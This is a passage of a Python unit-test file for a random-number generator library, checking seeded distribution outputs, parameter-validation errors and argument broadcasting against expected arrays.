cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="other"
)
assert_raises(ValueError, random.multivariate_normal, np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal, mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal, mu, np.eye(3))
def test_negative_binomial(self):
random.bit_generator.seed(self.seed)
actual = random.negative_binomial(n=100, p=0.12345, size=(3, 2))
desired = np.array([[521, 736], [665, 690], [723, 751]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100, [np.nan] * 10)
def test_noncentral_chisquare(self):
random.bit_generator.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array(
[
[9.47783251920357, 10.02066178260461],
[3.15869984192364, 10.5581565031544],
[5.01652540543548, 13.7689551218441],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=0.5, nonc=0.2, size=(3, 2))
desired = np.array(
[
[0.00145153051285, 0.22432468724778],
[0.02956713468556, 0.00207192946898],
[1.41985055641800, 0.15451287602753],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
random.bit_generator.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array(
[
[3.64881368071039, 5.48224544747803],
[20.41999842025404, 3.44075915187367],
[1.29765160605552, 1.64125033268606],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.bit_generator.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1, size=(3, 2))
desired = np.array(
[
[1.22680230963236, 2.56457837623956],
[2.7653304499494, 7.4336268865443],
[1.16362730891403, 2.54104276581491],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.bit_generator.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.bit_generator.seed(self.seed)
actual = random.normal(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[-6.822051212221923, -0.094420339458285],
[-0.368474717792823, -1.284746311523402],
[0.843661763232711, 0.379120992544734],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.0)
def test_pareto(self):
random.bit_generator.seed(self.seed)
actual = random.pareto(a=0.123456789, size=(3, 2))
desired = np.array(
[
[5.6883528121891552e16, 4.0569373841667057e03],
[1.2854967019379475e12, 6.5833156486851483e04],
[1.1281132447159091e01, 3.1895968171107006e08],
]
)
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.bit_generator.seed(self.seed)
actual = random.poisson(lam=0.123456789, size=(3, 2))
desired = np.array([[0, 0], [1, 0], [0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo("int64").max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.bit_generator.seed(self.seed)
actual = random.power(a=0.123456789, size=(3, 2))
desired = np.array(
[
[9.328833342693975e-01, 2.742250409261003e-02],
[7.684513237993961e-01, 9.297548209160028e-02],
[2.214811188828573e-05, 4.693448360603472e-01],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.bit_generator.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array(
[
[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.0)
def test_standard_cauchy(self):
random.bit_generator.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array(
[
[31.87809592667601, 0.349332782046838],
[2.816995747731641, 10.552372563459114],
[2.485608017991235, 7.843211273201831],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.bit_generator.seed(self.seed)
actual = random.standard_exponential(size=(3, 2), method="inv")
desired = np.array(
[
[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random.bit_generator.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array(
[
[2.28483515569645, 3.29899524967824],
[11.12492298902645, 2.16784417297277],
[0.92121813690910, 1.12853552328470],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_scalar_float(self):
random.bit_generator.seed(self.seed)
actual = random.standard_gamma(3, dtype=np.float32)
desired = 1.3877466
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random.bit_generator.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array(
[[2.2848352, 3.2989952], [11.124923, 2.1678442], [0.9212181, 1.1285355]]
)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random.bit_generator.seed(self.seed)
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array(
[[6.9824033, 7.3731737], [14.860578, 7.5327270], [11.767487, 6.2320185]],
dtype=np.float32,
)
assert_array_almost_equal(actual, desired, decimal=5)
random.bit_generator.seed(self.seed)
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.0, dtype="int32")
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20, out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1), out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.0)
def test_standard_normal(self):
random.bit_generator.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array(
[
[-3.472754000610961, -0.108938564229143],
[-0.245965753396411, -0.704101550261701],
[0.360102487116356, 0.127832101772367],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random.bit_generator.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array(
[
[-3.68722108185508, -0.672031186266171],
[2.900224996448669, -0.199656996187739],
[-1.12179956985969, 1.85668262342106],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.bit_generator.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34, size=(3, 2))
desired = np.array(
[
[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.bit_generator.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array(
[
[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo("float").min
fmax = np.finfo("float").max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_uniform_neg_range(self):
func = random.uniform
assert_raises(ValueError, func, 2, 1)
assert_raises(ValueError, func, [1, 2], [1, 1])
assert_raises(ValueError, func, [[0, 1], [2, 3]], 2)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.bit_generator.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array(
[
[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.bit_generator.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=1.1e-8, size=10 ** 6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.bit_generator.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.bit_generator.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array(
[
[0.10653278160339, 0.98771068102461],
[0.89276055317879, 0.13640126419923],
[0.9194319091599, 0.36037816317472],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.bit_generator.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array(
[
[3.557276979846361, 1.020870580998542],
[2.731847777612348, 1.29148068905082],
[0.385531483942839, 2.049551716717254],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.bit_generator.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.0)
def test_zipf(self):
random.bit_generator.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29], [1, 1], [3, 13]])
assert_array_equal(actual, desired)
def test_complex_normal(self):
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=1.0, gamma=1.0, relation=0.5, size=(3, 2))
desired = np.array(
[
[
-2.007493185623132 - 0.05446928211457126j,
0.7869874090977291 - 0.35205077513085050j,
],
[
1.3118579018087224 + 0.06391605088618339j,
3.5872278793967554 + 0.14155458439717636j,
],
[
0.7170022862582056 - 0.06573393915140235j,
-0.26571837106621987 - 0.0931713830979103j,
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=0, gamma=1.0, relation=0.5, size=3)
assert_array_almost_equal(actual, desired.flat[:3] - 1.0, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=2.0, gamma=1.0, relation=0.5)
assert_array_almost_equal(actual, 1.0 + desired[0, 0], decimal=15)
def test_complex_normal_invalid(self):
assert_raises(ValueError, random.complex_normal, gamma=1 + 0.5j)
assert_raises(ValueError, random.complex_normal, relation=2)
assert_raises(ValueError, random.complex_normal, relation=-3)
assert_raises(ValueError, random.complex_normal, relation=10j)
assert_raises(ValueError, random.complex_normal, gamma=[1 + 0.5j])
assert_raises(ValueError, random.complex_normal, relation=[2])
assert_raises(ValueError, random.complex_normal, relation=[-3])
assert_raises(ValueError, random.complex_normal, relation=[10j])
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.bit_generator.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array(
[0.53283302478975902, 0.53413660089041659, 0.50955303552646702]
)
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([0.454879818179180, -0.62749179463661, -0.06063266769872])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
assert_raises(ValueError, random.normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.63222080311226, 0.33310522220774, 0.64494078460190])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([1.68591211640990, 3.14186859487914, 0.67717375919228])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([1.68591211640990, 3.14186859487914, 0.67717375919228])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([3.37182423281980, 6.28373718975827, 1.35434751838456])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.84207044881810, 3.08607209903483, 3.12823105933169])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([3.83710578542563, 8.74926819712029, 0.48892943835401])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([21.57878070681719, 1.17110217503908])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array(
[0.57022801133088286, 0.51947702108840776, 0.1320969254923558]
)
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([2.20478739452297, 1.45177405755115, 1.00418921695354])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([0.60081050724244, -0.90380889829210, -0.64499590504117])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array(
[2.9883443664201312, -2.7064099483995943, -1.8672476700665914]
)
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([4.397371719158540, 22.14707898642946, 0.968306954322200])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([1.68591211640990, 3.14186859487914, 0.67717375919228])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.81472463783615, 0.95679800459547, 0.49194916077287])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array(
[0.067921356028507157, 0.070715642226971326, 0.019290950698972624]
)
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array(
[0.2730318639556768, 0.26936705726291116, 0.33906220393037939]
)
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array(
[0.13152135837586171, 0.13675915696285773, 0.038216792802833396]
)
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([1.57598396702930, 0.53392932731280, 0.94116889802361])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689, 1.2360119924878694, 1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.36297361471752, 0.52190135028254, 0.55111022040727])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429, 2.0347400359389356, 2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
assert_raises(ValueError, triangular, 10.0, 0.0, 20.0)
assert_raises(ValueError, triangular, 10.0, 25.0, 20.0)
assert_raises(ValueError, triangular, 10.0, 10.0, 10.0)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
self.set_seed()
actual = binom(n * 3, p, size=(3,))
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([3, 1, 2], dtype=np.int64)
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid="ignore"):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed, mode="legacy"))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(
ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one
)
assert_raises(
ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two
)
random = Generator(MT19937(self.seed, mode="legacy"))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(
ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one
)
assert_raises(
ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two
)
random = Generator(MT19937(self.seed, mode="legacy"))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2 ** 30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2 ** 31, 50)
assert_raises(ValueError, hypergeom, 999, [2 ** 29, 2 ** 30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_complex_normal(self):
random.bit_generator.seed(self.seed)
loc = np.ones((1, 2))
gamma = np.ones((3, 1))
relation = 0.5 * np.ones((3, 2))
actual = random.complex_normal(loc=loc, gamma=gamma, relation=relation)
desired = np.array(
[
[
1.393937478212015 - 0.31374589731830593j,
